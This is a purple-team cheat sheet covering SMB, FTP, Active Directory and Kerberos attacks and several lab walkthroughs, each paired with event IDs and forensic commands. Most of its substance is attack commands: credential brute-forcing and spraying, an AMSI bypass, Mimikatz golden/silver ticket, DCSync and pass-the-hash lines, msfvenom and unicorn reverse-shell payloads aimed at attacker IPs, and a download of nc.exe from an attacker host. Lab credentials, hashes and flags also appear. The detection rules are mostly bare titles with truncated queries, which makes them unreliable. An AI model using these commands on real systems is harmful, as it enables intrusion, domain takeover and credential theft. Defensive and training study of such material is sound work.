Purple Teaming
Discord: https://discord.gg/CqV6aJXMkA
Telegram: https://t.me/Hadess_security
Purple Team Cheat Sheet: SMB Attacks and Detection
SMB Attack Commands
Enumerating Shares
smbclient -L \\\\TARGET_IP
Lists SMB shares on the target.
Null Session
rpcclient -U "" -N TARGET_IP
Connects to the target with a null session.
Brute Force
crackmapexec smb TARGET_IP -u users.txt -p passwords.txt
Brute-forces SMB credentials.
Detection: Event Codes and KQL/EQL Rules
4624
An account was successfully logged on.
`SecurityEvent
4648
A logon was attempted using explicit credentials.
`SecurityEvent
5145
A network share object was checked to see whether client can be granted desired access.
`SecurityEvent
Forensics Commands and Codes
log2timeline.py
Extracts timeline from forensic images.
psort.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Sorts events in the plaso file and outputs to CSV.
fls -r -m "/" image.E01 > bodyfile
Generates a body file from an image.
KQL Rule: Suspicious SMB Login
EQL Rule: Excessive SMB Failures
KQL Rule: Unusual SMB Traffic
Purple Team Cheat Sheet: FTP Attacks and Detection
FTP Attack Commands
Anonymous Login
ftp TARGET_IP then enter anonymous as user
Attempts anonymous login to FTP server.
Brute Force
hydra -l user -P passlist.txt ftp://TARGET_IP
Brute-forces FTP credentials.
File Upload
ftp TARGET_IP then use put filename
Uploads a file to the FTP server.
Detection: Event Codes and KQL/EQL Rules
4625
An account failed to log on.
`SecurityEvent
4648
A logon was attempted using explicit credentials.
`SecurityEvent
5156
The Windows Filtering Platform has permitted a connection.
`SecurityEvent
Forensics Commands and Codes
tcpdump -i eth0 port 21 -w ftp_traffic.pcap
Captures FTP traffic on port 21.
plaso -o l2tcsv -f ftp_traffic.pcap -w output.csv
Processes pcap file with Plaso for timeline analysis.
grep -i 'ftp' forensic_image.raw
Searches for FTP-related strings in a forensic image.
KQL Rule: Suspicious FTP Login Attempts
EQL Rule: FTP Brute Force Detection
KQL Rule: Unusual FTP File Uploads
Attack Techniques and Commands
LLMNR Poisoning
Responder -I eth0 -wrf
Uses Responder to poison LLMNR requests.
AS-REP Roasting
GetNPUsers.py DOMAIN/ -usersfile users.txt -format hashcat -outputfile asrep_hashes
Extracts AS-REP hashes for users without pre-authentication.
ForceChangePassword
Set-DomainUserPassword -Identity user -AccountPassword (ConvertTo-SecureString 'NewPass!' -AsPlainText -Force)
Forces a password change for a domain user.
GenericWrite
Add-DomainObjectAcl -TargetIdentity "DOMAIN\Group" -PrincipalIdentity "Attacker" -Rights All
Modifies permissions for a domain object.
Password Spraying
crackmapexec smb DOMAIN -u users.txt -p 'Password123' --continue-on-success
Attempts to log in with a common password.
RunForrestRun.exe
.\RunForrestRun.exe -Domain DOMAIN -User user -Password 'Password123'
Executes RunForrestRun for lateral movement.
Abusing Vulnerable GPO
New-GPOImmediateTask -Name "MaliciousTask" -Command "cmd.exe" -Arguments "/c evil_script.bat"
Creates a GPO to run a malicious task.
Abusing MSSQL Service
Invoke-SQLOSCmd -Instance "MSSQLSERVER" -Command "net localgroup Administrators /add DOMAIN\user"
Executes a command via SQL Server.
Abusing Domain Trusts
Get-DomainTrustMapping -API
Enumerates and abuses domain trusts.
Detection: Event Codes and KQL/EQL Rules
4742
A computer account was changed.
`SecurityEvent
4624
An account was successfully logged on.
`SecurityEvent
4672
Special privileges assigned to new logon.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent
Forensics Commands and Codes
tcpdump -i eth0 port 445 or port 139 -w smb_traffic.pcap
Captures SMB traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Full Raw KQL/EQL Rules for Detecting Malicious Patterns
KQL Rule: LLMNR Poisoning Detection
EQL Rule: AS-REP Roasting Activity
KQL Rule: Unusual Process Execution
Attack Techniques and Commands
Service Permission
sc.exe sdset SERVICE_NAME DACL_string
Modifies service permissions.
ForceChangePassword
Set-DomainUserPassword -Identity user -AccountPassword (ConvertTo-SecureString 'NewPass!' -AsPlainText -Force)
Forces a password change for a domain user.
Abuse ACLs
Add-DomainObjectAcl -TargetIdentity "DOMAIN\Group" -PrincipalIdentity "Attacker" -Rights All
Modifies ACLs for domain objects.
Abuse SQL Instance
Invoke-SQLOSCmd -Instance "MSSQLSERVER" -Command "malicious_command"
Executes commands via SQL Server instance.
Abuse Service
sc.exe create evilservice binPath= "cmd.exe /c evil_script.bat"
Creates a malicious service.
Pass the Ticket
mimikatz.exe "kerberos::ptt ticket.kirbi"
Uses stolen Kerberos tickets for authentication.
Golden Ticket
mimikatz.exe "kerberos::golden /user:Administrator /domain:DOMAIN /sid:SID /krbtgt:KRBTGT_HASH /id:500"
Creates a Golden Ticket for domain persistence.
Detection: Event Codes and KQL/EQL Rules
4672
Special privileges assigned to new logon.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
4728
A member was added to a security-enabled global group.
`SecurityEvent
4768
Kerberos Authentication Ticket (TGT) was requested.
`SecurityEvent
4769
Kerberos Service Ticket (TGS) was requested.
`SecurityEvent
Forensics Commands and Codes
tcpdump -i eth0 port 88 -w kerberos_traffic.pcap
Captures Kerberos traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Full Raw KQL/EQL Rules for Detecting Malicious Patterns
KQL Rule: Unusual Service Creation
EQL Rule: Abnormal Kerberos Ticket Requests
KQL Rule: Suspicious ACL Modifications
Attack Techniques and Commands
Always Elevated
Set-ADObject -Identity user -Replace @{msDS-AllowedToActOnBehalfOfOtherIdentity='SDDL_string'}
Modifies AD object to grant elevated privileges.
Constrained Delegation
Set-ADComputer -Identity target -PrincipalsAllowedToDelegateToAccount attacker
Sets constrained delegation on a target computer.
Unconstrained Delegation Print Bug
Rubeus.exe monitor /interval:30 /nowrap
Monitors for TGTs if unconstrained delegation is enabled.
Cross Trust
Get-DomainTrust -Domain target_domain
Enumerates trust relationships between domains.
Abuse MSSQL Service
Invoke-SQLOSCmd -Instance "MSSQLSERVER" -Command "malicious_command"
Executes commands via SQL Server instance.
Detection: Event Codes and KQL/EQL Rules
4672
Special privileges assigned to new logon.
`SecurityEvent
4768
Kerberos Authentication Ticket (TGT) was requested.
`SecurityEvent
4769
Kerberos Service Ticket (TGS) was requested.
`SecurityEvent
4624
An account was successfully logged on.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent
Forensics Commands and Codes
tcpdump -i eth0 port 88 -w kerberos_traffic.pcap
Captures Kerberos traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Full Raw KQL/EQL Rules for Detecting Malicious Patterns
KQL Rule: Unusual Privilege Escalation
EQL Rule: Suspicious Delegation Use
KQL Rule: Abnormal SQL Server Command Execution
Attack Techniques and Commands
Bypass AMSI
GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Disables AMSI in a PowerShell session.
Always Elevated
Set-ADObject -Identity user -Replace @{msDS-AllowedToActOnBehalfOfOtherIdentity='SDDL_string'}
Modifies AD object to grant elevated privileges.
Constrained Delegation
Set-ADComputer -Identity target -PrincipalsAllowedToDelegateToAccount attacker
Sets constrained delegation on a target computer.
Pass the Ticket
mimikatz.exe "kerberos::ptt ticket.kirbi"
Uses stolen Kerberos tickets for authentication.
Abuse SQL Instance
Invoke-SQLOSCmd -Instance "MSSQLSERVER" -Command "malicious_command"
Executes commands via SQL Server instance.
Abuse GPO
New-GPOImmediateTask -Name "MaliciousTask" -Command "cmd.exe" -Arguments "/c evil_script.bat"
Creates a GPO to run a malicious task.
DSync Attack
mimikatz.exe "lsadump::dcsync /user:domain\krbtgt"
Extracts credentials from AD using DCSync.
Detection: Event Codes and KQL/EQL Rules
4104
PowerShell script block logging.
`SecurityEvent
4672
Special privileges assigned to new logon.
`SecurityEvent
4768
Kerberos Authentication Ticket (TGT) was requested.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent
Forensics Commands and Codes
tcpdump -i eth0 port 88 -w kerberos_traffic.pcap
Captures Kerberos traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Full Raw KQL/EQL Rules for Detecting Malicious Patterns
KQL Rule: AMSI Bypass Detection
EQL Rule: Unusual Kerberos Ticket Requests
KQL Rule: Suspicious SQL Command Execution
Purple Team Cheat Sheet: Comprehensive Attack Scenario
Attack Techniques and Commands
Map Scanning
nmap -sC -sV -oA map/result 10.10.10.210
Scans the target for open ports and services.
Gobuster Directory Scanning
gobuster dir -u https://10.10.10.210 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -t 50
Enumerates directories on the web server.
Gathering Usernames
Gather usernames manually and create a user.txt file
Collects usernames for further attacks.
Password Spraying
python3 atomizer.py owa 10.10.10.210 pass.txt user.txt -i 0:0:01
Attempts to log in with common passwords.
Sending Phishing Emails
Use Outlook to send phishing emails and capture NTLMv2 hash with Responder
Executes a phishing campaign.
Cracking NTLMv2 Hash
hashcat -m 5600 hash /us/share/wordlists/rockyou.txt -force
Cracks captured NTLMv2 hashes.
PowerShell Remote Session
Soffsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential k.svensson
Establishes a remote PowerShell session.
Creating a Symlink
New-Item -ItemType Junction -Path 'C:\ProgramData\root' -Target 'C:\Users\Administrator'
Creates a symbolic link to escalate privileges.
Using Check-File Command
Check-File C:\programdata\root\Desktop\root.txt
Checks for the presence of a specific file.
Transferring Files with nc.exe
iwr -uri http://10.10.xx.xx/nc.exe -o 'C:\Windows\System32\spool\drivers\color\nc.exe'
Transfers files using nc.exe.
Detection: Event Codes and KQL/EQL Rules
4624
An account was successfully logged on.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent
4720
A user account was created.
`SecurityEvent
1102
The audit log was cleared.
`SecurityEvent
Forensics Commands and Codes
tcpdump -i eth0 port 80 -w http_traffic.pcap
Captures HTTP traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Full Raw KQL/EQL Rules for Detecting Malicious Patterns
KQL Rule: Unusual Network Traffic
EQL Rule: Suspicious Process Creation
KQL Rule: Abnormal File Access
Purple Team Cheat Sheet: Web-Based Attack Scenario
Attack Techniques and Commands
Nmap Scanning
nmap -sC -sV -oA nmap/result 10.10.10.211
Scans the target for open ports and services.
Web Enumeration with Wappalyzer
Use Wappalyzer to identify backend technologies
Identifies technologies used on the web server.
Analyzing .git Directory
Check the Gemfile in the git directory for Ruby and Gem versions
Analyzes the .git directory for sensitive information.
Exploiting Ruby on Rails
Use a Ruby on Rails exploit
Exploits vulnerabilities in Ruby on Rails.
Capturing Request in Burp
Capture the request and modify it with the exploit
Captures and modifies HTTP requests for exploitation.
Getting a Reverse Shell
Use netcat listener and send the exploit to get a reverse shell
Gains shell access on the target system.
Cracking Password Hashes
Use John the Ripper to crack password hashes found in /var/backups
Cracks password hashes to gain credentials.
Bypassing Two-Factor Authentication
Use the contents of .google_authenticator to bypass two-factor authentication
Bypasses 2FA using the .google_authenticator file.
Synchronizing Time for Exploit
Adjust the system time to match the timezone for the exploit to work
Synchronizes system time for time-based exploits.
Gaining Root Access with GTFOBins
sudo gem open -e "/bin/sh -c /bin/sh" rdoc to gain root access
Uses GTFOBins for privilege escalation.
Detection: Event Codes and KQL/EQL Rules
4624
An account was successfully logged on.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent
4720
A user account was created.
`SecurityEvent
1102
The audit log was cleared.
`SecurityEvent
Forensics Commands and Codes
tcpdump -i eth0 port 80 -w http_traffic.pcap
Captures HTTP traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Full Raw KQL/EQL Rules for Detecting Malicious Patterns
KQL Rule: Unusual Network Traffic
EQL Rule: Suspicious Process Creation
KQL Rule: Abnormal File Access
Purple Team Cheat Sheet: Recon to Exploitation Scenario
Attack Techniques and Commands
Recon
Nmap Scanning
nmap -sV -sC -oN nmap 10.10.10.237
Scans the target for open ports and services.
Recon
File Analysis
file headv1\\Setup\\1.0.0.exe
Analyzes the executable file for type and content.
Recon
SMB Enumeration
smbclient -L \\\\10.10.10.237
Enumerates SMB shares on the target.
Recon
SMB File Transfer
smbclient \\\\10.10.10.237\\Software_Updates then get UAT_Testing_Procedures.pdf
Transfers files via SMB.
Exploitation
Crafting Malicious Binary
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.30 LPORT=9001 -f exe -o "rspoof.exe"
Creates a reverse shell executable.
Exploitation
YML File Creation
Manual creation of latest.yml file
Creates a .yml file for the exploit.
Exploitation
SMB File Transfer
smbclient \\\\10.10.10.237\\Software_Updates then put latest.yml
Uploads .yml file via SMB.
Exploitation
Reverse Shell
Use Metasploit to listen for the reverse shell
Listens for an incoming reverse shell connection.
Exploitation
Redis Exploitation
redis-cli -h 10.10.10.237 then get pk:urn:user:e8e29158-d70d-44b1-alba-4949d52790a0
Exploits Redis to retrieve data.
Exploitation
Password Decryption
python3 decrypt.py with the script provided in the summary
Decrypts a password using a provided script.
Detection: Event Codes and KQL/EQL Rules
4624
An account was successfully logged on.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent
1102
The audit log was cleared.
`SecurityEvent
4768
Kerberos Authentication Ticket (TGT) was requested.
`SecurityEvent
Forensics Commands and Codes
tcpdump -i eth0 port 445 -w smb_traffic.pcap
Captures SMB traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Full Raw KQL/EQL Rules for Detecting Malicious Patterns
KQL Rule: Unusual SMB Traffic
EQL Rule: Suspicious Process Execution
KQL Rule: Abnormal File Access Patterns
Purple Team Cheat Sheet: Credential and Connection Scenario
Attack Techniques and Commands
Credential Dumping
Enumerating Credentials
Get-ChildItem C:\Users\epugh\AppData\Local\Microsoft\Credentials\ -force
Enumerates credentials on WSO2.
Credential Dumping
Using Mimikatz
Upload mimikatz.exe and execute sekurlsa::dpapi to get the master key
Dumps credentials using Mimikatz.
Credential Decryption
Decrypting Credentials
dpapi::cred /in: C:\users\epugh\AppData\Local\Microsoft\Credentials\936A68B5AC87C545C4A22D1AF264C8E9 /masterkey: 40fc84
Decrypts credentials.
Port Forwarding
Setting up Port Forwarding
portfwd add -L 10.10.14.83 -I 10.10.122.15 -l 3389 -p 3389
Sets up port forwarding.
RDP Connection
Connecting via RDP with Remmina
Install Remmina, import sq101.rdp, change host, export to rdp file
Connects via RDP using Remmina.
RDP Connection
Using FreeRDP
xfreerdp sql.rdp /u: epugh_adm /d:rastalabs.local
Connects via RDP using FreeRDP.
Detection: Event Codes, KQL/EQL, Sysmon, and Wazuh Rules
4624
An account was successfully logged on.
`SecurityEvent
where EventID == 4624`
4688
A new process has been created.
`SecurityEvent
where EventID == 4688`
5145
A network share object was checked.
`SecurityEvent
where EventID == 5145`
4672
Special privileges assigned to new logon.
`SecurityEvent
where EventID == 4672`
3389
RDP Connection Attempt.
`NetworkTraffic
where DestinationPort == 3389`
Forensics Commands and Codes
tcpdump -i eth0 port 3389 -w rdp_traffic.pcap
Captures RDP traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Full Raw KQL/EQL Rules for Detecting Malicious Patterns
KQL Rule: Unusual Credential Access
EQL Rule: Suspicious RDP Activity
Sysmon/Wazuh Rule: Mimikatz Execution Detection
Purple Team Cheat Sheet: Credential and Exploitation Scenario
Attack Techniques and Commands
Credential Enumeration
Finding LAPS Group Members
Enumeration to find ngodfrey_adm is part of LAPS group on WS05
Identifies LAPS group members.
Credential Access
Dumping Credentials with PowerSploit
powershell -ep bypass then Import-module /PowerSploit.psd1
Dumps credentials using PowerSploit.
Credential Access
Using Credentials for Access
$SecPassword = ConvertTo-SecureString "J5KCwKruINyCJBKd1dZU" -AsPlainText -Force then $cred = New-Object System.Management.Automation.PSCredential ('rastalabs.local\\ngodfrey_adm', $SecPassword)
Uses dumped credentials for access.
Credential Access
Getting AD Object with Credentials
Get-ADObject -Name web01 -DomainController 10.10.120.1 -Credential $Cred
Retrieves AD objects using credentials.
Local Admin Passwords
Retrieving Local Admin Passwords
Passwords are listed for WS01, WS02, WSO3, WSO4, WSO5
Retrieves local admin passwords.
Port Forwarding
Setting up Port Forwarding with Meterpreter
portfwd add -L 10.10.14.83 -I 10.10.121.101 -l 447 -p 445 and similar for other ports
Sets up port forwarding using Meterpreter.
Exploitation
Using MS17-010 Exploit
exploit/windows/smb/ms17_010_psexec with lport 80, 443, 8080
Exploits MS17-010 for admin shell.
Flag Retrieval
Retrieving Flags
Flags are RASTA{3v3rybOdy_10v35_14p5}, RASTA-wh3¼3_w45_2£4_!?3, RASTA-50m371m35.yOu_mu57_b4ck714ck}
Retrieves flags from WS02 and WS04.
Post-Exploitation
Running Mimikatz
privilege::debug then sekurlsa::logonPasswords
Runs Mimikatz on WS02 to dump credentials.
Detection: Event Codes and KQL Rules
4624
An account was successfully logged on.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent
4672
Special privileges assigned to new logon.
`SecurityEvent
7045
A new service was installed.
`SecurityEvent
Forensics Commands and Codes
tcpdump -i eth0 port 445 -w smb_traffic.pcap
Captures SMB traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Full Raw KQL Rules for Detecting Malicious Patterns
KQL Rule: Unusual Credential Access
KQL Rule: Suspicious Port Forwarding Activity
KQL Rule: Exploitation Attempts Detection
Purple Team Cheat Sheet: Phishing to Network Recon Scenario
Attack Techniques and Commands
Phishing
Creating Phishing HTA
python unicorn.py windows/meterpreter/reverse_https 10.10.14.83 443 hta
Generates a phishing HTA file.
Web Server Setup
Hosting HTA on Apache2
copy index.html launcher.hta /var/www/html; service apache2 start
Hosts the HTA file on Apache2 server.
Listener Setup
Setting up Metasploit Listener
msfconsole -r unicorn.rc
Sets up a listener in Metasploit.
Share Enumeration
Viewing Shares on Network
net share
Enumerates shared resources on the network.
User Enumeration
Displaying Domain User Accounts
net user /domain
Lists user accounts on the domain.
User Information
Viewing User Info
net user [username] /domain
Displays information about a specific domain user.
Group Enumeration
Viewing Domain Group Members
net group finance /domain
Lists members of a specific domain group.
Drive Enumeration
Listing Logical Drives
fsutil fsinfo drives; wmic logicaldisk get name; diskpart > list volume
Enumerates logical drives on the system.
Network Recon
Pinging Servers for IP Addresses
ping DC01; ping FS01; ...; ping WS05
Pings servers to discover IP addresses.
Flag Retrieval
Accessing the Flag
Flag is XYZ located in M:\\Documents
Retrieves a flag from a specified location.
KeePass Database
Found KeePass Database and Key File
Located KeePass database and key file
Identifies KeePass database and key file.
Detection: Event Codes and KQL Rules
4624
An account was successfully logged on.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent
4768
Kerberos Authentication Ticket (TGT) was requested.
`SecurityEvent
1102
The audit log was cleared.
`SecurityEvent
Forensics Commands and Codes
tcpdump -i eth0 port 80 -w http_traffic.pcap
Captures HTTP traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Full Raw KQL Rules for Detecting Malicious Patterns
KQL Rule: Suspicious Web Server Activity
KQL Rule: Unusual Network Share Access
KQL Rule: Abnormal User Enumeration Activity
Attack Techniques and Commands
Credential Use
Using epugh_adm Credentials
Log in to web01 (10.10.110.10) and then RDP to sq101 (10.10.122.15) using epugh_adm creds
Uses credentials to access multiple systems.
Lateral Movement
RDP with gopikrishna
RDP to fs01 with user gopikrishna [local admin]
Uses RDP for lateral movement.
Malware Execution
Running pOwnedshell.exe
Run pOwnedshell.exe with admin cmd
Executes malware with administrative privileges.
Credential Dumping
Invoke Mimikatz from pOwnedshell
Use option 4 in pOwnedshell, invoke Mimikatz to get rweston_da NTLM hash
Dumps credentials using Mimikatz.
Credential Use
Pass-the-Hash with Mimikatz
sekurlsa::pth /user: rweston_da /domain:rastalabs.local /ntlm:3ff61fa259deee15e4042159d7b832fa
Uses pass-the-hash technique for authentication.
Golden Ticket Attack
Perform DCSync
Use option 10 in pOwnedshell, perform DCSync
Extracts krbtgt hash for Golden Ticket creation.
Golden Ticket Attack
Generate Golden Ticket
kerberos::golden /domain:rastalabs.local /user: rweston_da /sid:S-1-5-21-1396373213-2872852198-2033860859 /krbtgt:1b6e14bc52b67a235717938a8bbcebib /ticket:C:\\Users\\GOPIKR~1\\Desktop\\rweston_da.ticket
Creates a Golden Ticket for domain access.
Golden Ticket Attack
Use Golden Ticket
kerberos::ptt C:\\Users\\GOPIKR~1\\Desktop\\rweston_da.ticket
Uses the Golden Ticket for authentication.
Detection: Event Codes and KQL Rules
4624
An account was successfully logged on.
`SecurityEvent
4688
A new process has been created.
`SecurityEvent
5145
A network share object was checked.
`SecurityEvent
4768
Kerberos Authentication Ticket (TGT) was requested.
`SecurityEvent
4672
Special privileges assigned to new logon.
`SecurityEvent
Forensics Commands and Codes
tcpdump -i eth0 port 3389 -w rdp_traffic.pcap
Captures RDP traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Full Raw KQL Rules for Detecting Malicious Patterns
KQL Rule: Suspicious RDP Activity
KQL Rule: Abnormal Process Execution
KQL Rule: Golden Ticket Usage Detection
Purple Team Cheat Sheet: Golden Ticket Attack Scenario
Attack Technique and Command
Golden Ticket Attack
mimikatz.exe "kerberos::golden /user:Administrator /domain:yourdomain.com /sid:S-1-5-21-XXXXXX-XXXXXX-XXXXXX /krbtgt:XXXXXX /id:500 /ptt"
Generates a Golden Ticket using Mimikatz.
Detection: Event Codes and KQL/EQL Rules
4768
Kerberos TGT Requested
`SecurityEvent
4672
Special Privileges Assigned to New Logon
`SecurityEvent
4624
Successful Account Logon
`SecurityEvent
Forensics Commands and Codes
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
tcpdump -i eth0 port 88 -w kerberos_traffic.pcap
Captures Kerberos traffic for analysis.
Full Raw KQL/EQL Rules for Detecting Golden Ticket Usage
KQL Rule: Unusual Kerberos Ticket Granting Ticket Requests
EQL Rule: Anomalous Kerberos Privilege Assignments
KQL Rule: Suspicious Logon Types
Purple Team Cheat Sheet: Silver Ticket Attack Scenario
Attack Technique and Command
Silver Ticket Attack
mimikatz.exe "kerberos::golden /user:User /domain:yourdomain.com /sid:S-1-5-21-XXXXXX-XXXXXX-XXXXXX /target:service.yourdomain.com /service:ServiceType /rc4:XXXXXX /ptt"
Generates a Silver Ticket for a specific service using Mimikatz.
Detection: Event Codes and KQL/EQL Rules
4769
Kerberos Service Ticket (TGS) was requested
`SecurityEvent
4672
Special Privileges Assigned to New Logon
`SecurityEvent
4624
Successful Account Logon
`SecurityEvent
Forensics Commands and Codes
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
tcpdump -i eth0 port 88 -w kerberos_traffic.pcap
Captures Kerberos traffic for analysis.
Full Raw KQL/EQL Rules for Detecting Silver Ticket Usage
KQL Rule: Unusual Kerberos Service Ticket Requests
EQL Rule: Anomalous Kerberos Service Ticket Assignments
KQL Rule: Suspicious Logon Types
Purple Team Cheat Sheet: Kerberoasting Attack Scenario
Attack Technique and Command
Kerberoasting
GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD>
Uses GetUserSPNs.py to request service tickets for service accounts.
Kerberoasting
mimikatz.exe "kerberos::list /export"
Uses Mimikatz to list and export service tickets.
Detection: Event Codes and KQL/EQL Rules
4769
Kerberos Service Ticket (TGS) was requested
`SecurityEvent
4672
Special Privileges Assigned to New Logon
`SecurityEvent
Forensics Commands and Codes
tcpdump -i eth0 port 88 -w kerberos_traffic.pcap
Captures Kerberos traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Full Raw KQL/EQL Rules for Detecting Kerberoasting
KQL Rule: Unusual Kerberos Service Ticket Requests
EQL Rule: Anomalous Kerberos Service Ticket Activity
Purple Team Cheat Sheet: Pass the Ticket Attack Scenario
Attack Technique and Command
Pass the Ticket
mimikatz.exe "kerberos::ptt <ticket.kirbi>"
Uses Mimikatz to pass a Kerberos ticket for authentication.
Pass the Ticket
Invoke-Mimikatz -Command '"kerberos::ptt <ticket.kirbi>"'
Uses PowerShell and Mimikatz to pass a Kerberos ticket.
Detection: Event Codes and KQL/EQL Rules
4624
An account was successfully logged on.
`SecurityEvent
4672
Special Privileges Assigned to New Logon
`SecurityEvent
4768
Kerberos Authentication Ticket (TGT) was requested
`SecurityEvent
Forensics Commands and Codes
tcpdump -i eth0 port 88 -w kerberos_traffic.pcap
Captures Kerberos traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Full Raw KQL/EQL Rules for Detecting Pass the Ticket Usage
KQL Rule: Suspicious Kerberos Ticket Use
EQL Rule: Anomalous Kerberos Ticket Assignments
KQL Rule: Abnormal Kerberos TGT Requests
Purple Team Cheat Sheet: DCSync Attack Scenario
Attack Technique and Command
DCSync
mimikatz.exe "lsadump::dcsync /user:krbtgt /domain:yourdomain.com"
Uses Mimikatz to simulate the behavior of a Domain Controller and request account password data.
Detection: Event Codes and KQL/EQL Rules
4662
An operation was performed on an object
`SecurityEvent
4672
Special Privileges Assigned to New Logon
`SecurityEvent
4768
Kerberos Authentication Ticket (TGT) was requested
`SecurityEvent
Forensics Commands and Codes
tcpdump -i eth0 port 88 -w kerberos_traffic.pcap
Captures Kerberos traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Full Raw KQL/EQL Rules for Detecting DCSync Usage
KQL Rule: Unusual Directory Service Access
EQL Rule: Anomalous Directory Replication Requests
KQL Rule: Suspicious Kerberos TGT Requests
Purple Team Cheat Sheet: AS-REP Roasting Attack Scenario
Attack Technique and Command
AS-REP Roasting
GetNPUsers.py -request -dc-ip <DC_IP> <DOMAIN>/ -usersfile users.txt
Uses GetNPUsers.py to request AS-REP for users without pre-authentication.
AS-REP Roasting
Rubeus.exe asreproast
Uses Rubeus to perform AS-REP roasting on the domain.
Detection: Event Codes and KQL/EQL Rules
4768
Kerberos Authentication Ticket (TGT) was requested
`SecurityEvent
4769
Kerberos Service Ticket (TGS) was requested
`SecurityEvent
4771
Kerberos pre-authentication failed
`SecurityEvent
Forensics Commands and Codes
tcpdump -i eth0 port 88 -w kerberos_traffic.pcap
Captures Kerberos traffic for analysis.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
Full Raw KQL/EQL Rules for Detecting AS-REP Roasting
KQL Rule: Unusual Kerberos TGT Requests without Pre-Authentication
EQL Rule: Anomalous Kerberos Pre-Authentication Failures
KQL Rule: Suspicious Kerberos Service Ticket Requests
Purple Team Cheat Sheet: GenericWrite Attack Scenario
Attack Technique and Command
GenericWrite
Set-DomainObjectAcl -TargetIdentity "CN=GroupName,OU=Groups,DC=domain,DC=com" -PrincipalIdentity "hacker" -Rights GenericWrite
Uses PowerView to modify the ACL of a domain object, granting GenericWrite rights to an attacker.
GenericWrite
Add-DomainObjectAcl -TargetIdentity "CN=GroupName,OU=Groups,DC=domain,DC=com" -PrincipalIdentity "hacker" -Rights All
Adds an ACL entry to a domain object, granting full rights to an attacker.
Detection: Event Codes and KQL/EQL Rules
5136
A directory service object was modified
`SecurityEvent
4662
An operation was performed on an object
`SecurityEvent
4728
A member was added to a security-enabled global group
`SecurityEvent
Forensics Commands and Codes
log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv
Extracts timeline from forensic images.
volatility -f memory_dump.raw --profile=Win10x64_18362 netscan
Scans for network artifacts in a memory dump.
tcpdump -i eth0 -w network_traffic.pcap
